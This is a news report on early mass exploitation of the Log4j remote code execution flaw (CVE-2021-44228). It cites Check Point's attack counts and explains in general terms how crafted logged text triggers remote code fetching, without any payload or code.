Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones.
Israel’s Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post.
Apache Log4j is a logging utility written in Java that is used all over the world in many software packages and online systems. Last week it emerged that Alibaba security engineer Chen Zhaojun had found and privately disclosed on November 24 details of a trivial-to-exploit remote code execution hole (CVE-2021-44228) in Log4j 2.x, specifically versions 2.14.1 and earlier.
Exploitation is possible by feeding a specially crafted snippet of text, such as a message or username, to an application that logs this information using Log4j 2. If the text contains a particular sequence of characters, the logging utility will end up fetching Java code from an attacker-controlled server and executing it, allowing the machine to be remotely hijacked and controlled. It is easily wormable, and was present in all manner of things, from Steam and Minecraft to Apple’s iCloud.